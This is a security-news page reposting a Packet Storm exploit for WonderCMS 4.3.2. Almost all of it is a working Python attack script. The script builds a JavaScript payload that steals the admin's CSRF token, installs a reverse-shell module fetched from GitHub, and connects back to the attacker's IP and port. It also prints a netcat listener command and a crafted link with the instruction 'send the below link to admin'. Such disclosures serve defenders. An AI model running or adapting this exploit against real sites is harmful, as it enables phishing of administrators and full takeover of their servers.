Security
Headlines
HeadlinesLatestCVEs

Headline

WonderCMS 4.3.2 Cross Site Scripting / Remote Code Execution

WonderCMS version 4.3.2 remote exploit that leverages cross site scripting to achieve remote code execution.

Packet Storm
#xss#js#git#php#rce#auth#ssl
# Author: prodigiousMind# Exploit: Wondercms 4.3.2 XSS to RCEimport sysimport requestsimport osimport bs4if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")else:  data = '''var url = "'''+str(sys.argv[1])+'''";if (url.endsWith("/")) { url = url.slice(0, -1);}var urlWithoutLog = url.split("/").slice(0, -1).join("/");var urlWithoutLogBase = new URL(urlWithoutLog).pathname; var token = document.querySelectorAll('[name="token"]')[0].value;var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;var xhr3 = new XMLHttpRequest();xhr3.withCredentials = true;xhr3.open("GET", urlRev);xhr3.send();xhr3.onload = function() { if (xhr3.status == 200) {   var xhr4 = new XMLHttpRequest();   xhr4.withCredentials = true;   xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");   xhr4.send();   xhr4.onload = function() {     if (xhr4.status == 200) {       var ip = "'''+str(sys.argv[2])+'''";       var port = "'''+str(sys.argv[3])+'''";       var xhr5 = new XMLHttpRequest();       xhr5.withCredentials = true;       xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);       xhr5.send();            }   }; }};'''  try:    open("xss.js","w").write(data)    print("[+] xss.js is created")    print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))    print("----------------------------\n")    XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""    XSSlink = XSSlink.strip(" ")    print("send the below link to admin:\n\n----------------------------\n"+XSSlink)    print("----------------------------\n")    print("\nstarting HTTP server to allow the access to xss.js")    os.system("python3 -m http.server\n")  except: print(data,"\n","//write this to a file")

Packet Storm: Latest News

Ubuntu Security Notice USN-7121-3